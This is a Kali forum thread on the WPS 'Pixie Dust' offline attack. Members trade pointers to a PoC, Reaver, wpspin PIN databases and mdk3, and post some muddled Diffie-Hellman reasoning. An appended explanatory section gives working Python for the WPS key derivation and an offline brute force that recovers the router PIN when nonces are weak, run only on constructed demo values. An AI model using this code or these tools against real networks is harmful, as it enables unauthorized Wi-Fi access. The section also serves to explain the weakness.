Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #11 (Junior Member, joined Oct 2014, 28 posts)
    Yeah, share the knowledge if you know something we do not. Thanks.

  2. #12 (Senior Member, United States, joined Jul 2013, 517 posts)
    I have emailed Bongard; I don't think that he's gonna release any tool... Still waiting for a response from you, datahead.

  3. #13 (Senior Member, United States, joined Jul 2013, 517 posts)
    Quote Originally Posted by datahead:
    You are on the right track.
    I do have a complete and working PoC program that I use. While it says few routers, I've found a lot more are vulnerable than one would think. All through trial and error of testing which router has which chipset (Broadcom, Ralink, Atheros, etc.); around 12 of the 20 I've tested on have been vulnerable.
    OR could you explain how one can go about making their own tool? Such as what modifications we have to make to Reaver?

  4. #14 (Member, joined Jun 2014, 71 posts)
    Hello guys, I am new to Kali Linux, Reaver, aircrack and such. I was able to audit my Linksys E1000 with Reaver.

    But I wanted to know if you guys knew about wpspin. It's a piece of software for Windows, but it contains a database with WPS PINs. I am going to attach some screenshots:
    http://postimg.org/image/l7af4yy15/ , http://postimg.org/image/o0se9ux99/

    The name of it is WPS-PIN; I think the source is www.inforprograma.net. The software is in Spanish. It is very interesting.

  5. #15 (Junior Member, joined Jan 2014, 12 posts)
    wpspin, yes, it helped me find some keys in 3 seconds.
    The Windows version is WPSPIN Betis-Jesus;
    the other one works on Kali:
    wpspin v1.5

  6. #16 (Member, joined Jun 2014, 71 posts)
    What do you usually do when the AP limiting error comes?

  7. #17 (Senior Member, United States, joined Jul 2013, 517 posts)
    Quote Originally Posted by frafri:
    What do you usually do when the AP limiting error comes?
    Check this out:
    https://forums.kali.org/showthread.p...highlight=mdk3

  8. #18 (Senior Member, joined Jun 2013, 125 posts)
    Quote Originally Posted by soxrok2212:
    Ahh soxrok2212.. this thread brings back memories.... when I struggled with bash.. my first script.... I am still making lengthy roadways in bash and Python, thanks to this site ====> stackoverflow.com

  9. #19 (Senior Member, United States, joined Jul 2013, 517 posts)
    New piece of information I am trying to understand. So in the M1 message, we receive a nonce, aka the PKE (DH key from the enrollee). According to this document, the formula for generating these DH keys is g^AB mod p, aka PKR result^PKE private number mod p. (g is the public number from the registrar, AB is the enrollee's private number used to generate its own public number, and p is the prime modulus.) Now, both the enrollee and the registrar each know the shared secret, which I am led to believe is the seed of the PRNG (I may be wrong here, but it all makes sense... for now).

    For more information about Diffie-Hellman keys (DH keys), do a quick YouTube search for "dh key exchange" (can't post YouTube links).
    You can read more about modular arithmetic here.

    I'll be looking more into DH keys and their integration with PRNGs over the next few days/weeks. If you find anything, leave a comment.

  10. #20 (Senior Member, joined Jun 2013, 125 posts)
    Quote Originally Posted by soxrok2212:
    New piece of information I am trying to understand. So in the M1 message, we receive a nonce, aka the PKE (DH key from the enrollee). According to this document, the formula for generating these DH keys is g^AB mod p, aka PKR result^PKE private number mod p. (g is the public number from the registrar, AB is the enrollee's private number used to generate its own public number, and p is the prime modulus.) Now, both the enrollee and the registrar each know the shared secret, which I am led to believe is the seed of the PRNG (I may be wrong here, but it all makes sense... for now).

    For more information about Diffie-Hellman keys (DH keys), do a quick YouTube search for "dh key exchange" (can't post YouTube links).
    You can read more about modular arithmetic here.

    I'll be looking more into DH keys and their integration with PRNGs over the next few days/weeks. If you find anything, leave a comment.
    The time taken to decrypt the private keys (private random number) sent during the Diffie-Hellman process depends on the prime modulus used (mod p in our case)... the bigger the prime modulus, the longer it will take; also take into consideration the magnitude of the generator, in this case "g".... here is another good link which explains the "Alice and Bob" theory.. the mathematics might be a little messed up for some...

    http://www.academia.edu/1958665/Eucl...urity_Protocol

    GRAPHICAL PATTERNS in exponential functions that include the modulus of private random prime numbers might be a breakthrough in the future...
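The key material posts #19 and #20 are reasoning about, and the offline attack this thread is named after, as an added worked example. This is not code from the original page, from Bongard's PoC, or from Reaver or wpspin. It follows the registration-protocol derivations in the Wi-Fi Simple Configuration specification: PKE (enrollee) and PKR (registrar) are Diffie-Hellman public values g^x mod p in the RFC 3526 1536-bit MODP group with g = 2; DHKey is SHA-256 of the shared secret g^(ab) mod p; the nonce carried in M1 is N1, sent alongside PKE rather than being PKE; AuthKey comes from a KDF over HMAC(DHKey, N1 || EnrolleeMAC || N2). In M3 the enrollee commits to each half of its PIN with E-Hash1/E-Hash2, which also bind its secret nonces E-S1/E-S2. If those nonces are predictable, each PIN half falls to a small offline brute force against the captured hashes, with no further frames to the AP. Assumptions in this example: the enrollee is constructed to use all-zero E-S1/E-S2 as a stand-in for a weak PRNG; ENROLLEE_MAC, the 256-bit private exponents and the PIN 12345670 are constructed demo values; the function names (simulate_exchange, pixie_dust, and the rest) are mine.

```python
"""
WPS registration-protocol key derivation (M1..M3) and an offline PIN recovery
of the "Pixie Dust" kind. Added example; every input is constructed.
"""
import hashlib
import hmac
import os

# RFC 3526 1536-bit MODP group with generator 2: the DH group WPS uses for PKE/PKR.
WPS_DH_P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
    "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
    "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
    "670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF", 16)
WPS_DH_G = 2
KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"
ENROLLEE_MAC = bytes.fromhex("001122334455")  # constructed AP MAC for the demo


def dh_keypair(rng=os.urandom):
    """Private exponent x and the public value g^x mod p as the 192-byte field WPS sends."""
    priv = int.from_bytes(rng(32), "big")  # 256-bit exponent: a demo simplification
    return priv, pow(WPS_DH_G, priv, WPS_DH_P).to_bytes(192, "big")


def dh_key(priv, peer_pub):
    """DHKey = SHA-256(g^(ab) mod p): the shared secret both sides compute."""
    shared = pow(int.from_bytes(peer_pub, "big"), priv, WPS_DH_P)
    return hashlib.sha256(shared.to_bytes(192, "big")).digest()


def derive_keys(dhkey, n1, enrollee_mac, n2):
    """KDK = HMAC(DHKey, N1||MAC||N2); KDF -> AuthKey(32) | KeyWrapKey(16) | EMSK(32)."""
    kdk = hmac.new(dhkey, n1 + enrollee_mac + n2, hashlib.sha256).digest()
    out = b"".join(
        hmac.new(kdk, i.to_bytes(4, "big") + KDF_LABEL + (640).to_bytes(4, "big"),
                 hashlib.sha256).digest()
        for i in (1, 2, 3))[:80]
    return out[:32], out[32:48], out[48:80]


def psk(authkey, pin_half):
    """PSK1/PSK2: first 128 bits of HMAC(AuthKey, ASCII digits of that PIN half)."""
    return hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(authkey, e_s, psk_half, pke, pkr):
    """E-Hash1/2 = HMAC(AuthKey, E-S || PSK || PKE || PKR), sent by the enrollee in M3."""
    return hmac.new(authkey, e_s + psk_half + pke + pkr, hashlib.sha256).digest()


def wps_checksum_digit(seven_digits):
    """Eighth WPS PIN digit: weights 3,1,3,1,3,1,3 over the first seven, mod 10."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(seven_digits))
    return (10 - acc % 10) % 10


def simulate_exchange(pin, e_s1, e_s2, rng=os.urandom):
    """Run both sides of M1..M3 and return what a registrar (the attacker) gets to see."""
    e_priv, pke = dh_keypair(rng)          # M1: enrollee -> N1, PKE
    n1 = rng(16)
    r_priv, pkr = dh_keypair(rng)          # M2: registrar -> N2, PKR
    n2 = rng(16)
    authkey, _, _ = derive_keys(dh_key(e_priv, pkr), n1, ENROLLEE_MAC, n2)
    assert authkey == derive_keys(dh_key(r_priv, pke), n1, ENROLLEE_MAC, n2)[0]
    # M3: enrollee commits to its PIN; E-S1/E-S2 are meant to be secret, fresh random nonces.
    return {
        "authkey": authkey, "pke": pke, "pkr": pkr,
        "e_hash1": e_hash(authkey, e_s1, psk(authkey, pin[:4]), pke, pkr),
        "e_hash2": e_hash(authkey, e_s2, psk(authkey, pin[4:]), pke, pkr),
    }


def pixie_dust(seen, e_s1_guess, e_s2_guess):
    """Offline PIN recovery: with E-S1/E-S2 known, each PIN half falls to a small brute force.

    First half: 10^4 candidates. Second half: 10^3 candidates, since the last digit
    is a checksum. No frames go to the AP, so its rate limiting never comes into play.
    """
    a, pke, pkr = seen["authkey"], seen["pke"], seen["pkr"]
    first = next((f"{i:04d}" for i in range(10_000)
                  if hmac.compare_digest(e_hash(a, e_s1_guess, psk(a, f"{i:04d}"), pke, pkr),
                                         seen["e_hash1"])), None)
    if first is None:
        return None  # E-S1 guess was wrong: the nonce really was unpredictable
    for j in range(1_000):
        second = f"{j:03d}" + str(wps_checksum_digit(first + f"{j:03d}"))
        if hmac.compare_digest(e_hash(a, e_s2_guess, psk(a, second), pke, pkr), seen["e_hash2"]):
            return first + second
    return None


if __name__ == "__main__":
    zero = bytes(16)  # constructed weak-PRNG case: enrollee's E-S1 = E-S2 = 0
    print(pixie_dust(simulate_exchange("12345670", zero, zero), zero, zero))
```

Run stand-alone it prints the recovered PIN. Feed the same simulated enrollee fresh random E-S1/E-S2 (the spec-conformant behaviour) and pixie_dust returns None after exhausting the first half, which is the whole point: the DH modulus size that post #20 worries about is irrelevant to this attack, because nothing here attacks DH. The registrar legitimately learns AuthKey, PKE and PKR; the only secret protecting the PIN halves is the quality of the enrollee's E-S nonces.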
